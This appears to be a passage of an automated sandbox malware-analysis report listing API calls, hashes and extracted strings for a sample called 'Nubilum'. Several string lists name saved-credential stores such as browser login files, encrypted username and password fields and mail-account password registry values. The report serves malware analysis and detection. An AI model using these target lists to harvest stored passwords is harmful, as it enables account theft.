                          • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                          • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                          APIs
                          • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                          • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                          • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                          • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                          APIs
                          • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: EnumNamesResource
                          • String ID:
                          • API String ID: 3334572018-0
                          • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                          • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                          • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                          • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                          APIs
                          • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                          • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                          • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                          • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                          APIs
                          • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                          • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                          • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                          • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                          APIs
                          • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                          • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                          • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                          • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: PrivateProfileString_mbscmpstrlen
                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                          • API String ID: 3963849919-1658304561
                          • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                          • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                          • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                          • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                          APIs
                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                            • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                            • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                            • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                          • memset.MSVCRT ref: 0040E5B8
                          • memset.MSVCRT ref: 0040E5CD
                          • _mbscpy.MSVCRT ref: 0040E634
                          • _mbscpy.MSVCRT ref: 0040E64A
                          • _mbscpy.MSVCRT ref: 0040E660
                          • _mbscpy.MSVCRT ref: 0040E676
                          • _mbscpy.MSVCRT ref: 0040E68C
                          • _mbscpy.MSVCRT ref: 0040E69F
                          • memset.MSVCRT ref: 0040E6B5
                          • memset.MSVCRT ref: 0040E6CC
                            • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                            • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                          • memset.MSVCRT ref: 0040E736
                          • memset.MSVCRT ref: 0040E74F
                          • sprintf.MSVCRT ref: 0040E76D
                          • sprintf.MSVCRT ref: 0040E788
                          • _strcmpi.MSVCRT ref: 0040E79E
                          • _strcmpi.MSVCRT ref: 0040E7B7
                          • _strcmpi.MSVCRT ref: 0040E7D3
                          • memset.MSVCRT ref: 0040E858
                          • sprintf.MSVCRT ref: 0040E873
                          • _strcmpi.MSVCRT ref: 0040E889
                          • _strcmpi.MSVCRT ref: 0040E8A5
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                          • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                          • API String ID: 4171719235-3943159138
                          • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                          • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                          • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                          • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                          • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                          • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                          • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                          • GetWindowRect.USER32(00000000,?), ref: 0041047C
                          • GetWindowRect.USER32(?,?), ref: 00410487
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                          • GetDC.USER32 ref: 004104E2
                          • strlen.MSVCRT ref: 00410522
                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                          • ReleaseDC.USER32(?,?), ref: 00410580
                          • sprintf.MSVCRT ref: 00410640
                          • SetWindowTextA.USER32(?,?), ref: 00410654
                          • SetWindowTextA.USER32(?,00000000), ref: 00410672
                          • GetDlgItem.USER32(?,00000001), ref: 004106A8
                          • GetWindowRect.USER32(00000000,?), ref: 004106B8
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                          • GetClientRect.USER32(?,?), ref: 004106DD
                          • GetWindowRect.USER32(?,?), ref: 004106E7
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                          • GetClientRect.USER32(?,?), ref: 00410737
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                          • String ID: %s:$EDIT$STATIC
                          • API String ID: 1703216249-3046471546
                          • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                          • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                          • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                          • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                          APIs
                          • memset.MSVCRT ref: 004024F5
                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                          • _mbscpy.MSVCRT ref: 00402533
                          • _mbscpy.MSVCRT ref: 004025FD
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _mbscpy$QueryValuememset
                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                          • API String ID: 168965057-606283353
                          • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                          • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                          • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                          • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                          APIs
                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                          • LoadCursorA.USER32(00000067), ref: 0040115F
                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                          • EndDialog.USER32(?,00000001), ref: 0040121A
                          • DeleteObject.GDI32(?), ref: 00401226
                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                          • ShowWindow.USER32(00000000), ref: 00401253
                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                          • ShowWindow.USER32(00000000), ref: 00401262
                          • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                          • memset.MSVCRT ref: 0040128E
                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                          • String ID:
                          • API String ID: 2998058495-0
                          • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                          • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                          • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                          • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcmp$memcpy
                          • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                          • API String ID: 231171946-2189169393
                          • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                          • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                          • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                          • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _mbscat$memsetsprintf$_mbscpy
                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                          • API String ID: 633282248-1996832678
                          • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                          • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                          • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                          • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: sprintf$memset$_mbscpy
                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                          • API String ID: 3402215030-3842416460
                          • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                          • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                          • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                          • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                          APIs
                            • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                            • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                            • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                            • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                            • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                            • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                            • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                            • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                          • strlen.MSVCRT ref: 0040F139
                          • strlen.MSVCRT ref: 0040F147
                          • memset.MSVCRT ref: 0040F187
                          • strlen.MSVCRT ref: 0040F196
                          • strlen.MSVCRT ref: 0040F1A4
                          • memset.MSVCRT ref: 0040F1EA
                          • strlen.MSVCRT ref: 0040F1F9
                          • strlen.MSVCRT ref: 0040F207
                          • _strcmpi.MSVCRT ref: 0040F2B2
                          • _mbscpy.MSVCRT ref: 0040F2CD
                          • _mbscpy.MSVCRT ref: 0040F30E
                            • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                          • String ID: logins.json$none$signons.sqlite$signons.txt
                          • API String ID: 1613542760-3138536805
                          • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                          • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                          • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                          • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                          • API String ID: 1012775001-1343505058
                          • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                          • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                          • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                          • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                          APIs
                          • memset.MSVCRT ref: 00444612
                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                          • strlen.MSVCRT ref: 0044462E
                          • memset.MSVCRT ref: 00444668
                          • memset.MSVCRT ref: 0044467C
                          • memset.MSVCRT ref: 00444690
                          • memset.MSVCRT ref: 004446B6
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                            • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                          • memcpy.MSVCRT ref: 004446ED
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                          • memcpy.MSVCRT ref: 00444729
                          • memcpy.MSVCRT ref: 0044473B
                          • _mbscpy.MSVCRT ref: 00444812
                          • memcpy.MSVCRT ref: 00444843
                          • memcpy.MSVCRT ref: 00444855
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpymemset$strlen$_mbscpy
                          • String ID: salu
                          • API String ID: 3691931180-4177317985
                          • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                          • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                          • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                          • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                          APIs
                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                          • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$Library$FreeLoad
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                          • API String ID: 2449869053-232097475
                          • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                          • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                          • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                          • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                          APIs
                          • sprintf.MSVCRT ref: 0040957B
                          • LoadMenuA.USER32(?,?), ref: 00409589
                            • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                            • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                            • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                            • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                          • DestroyMenu.USER32(00000000), ref: 004095A7
                          • sprintf.MSVCRT ref: 004095EB
                          • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                          • memset.MSVCRT ref: 0040961C
                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                          • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                          • DestroyWindow.USER32(00000000), ref: 0040965C
                          Strings
                          Memory Dump Source
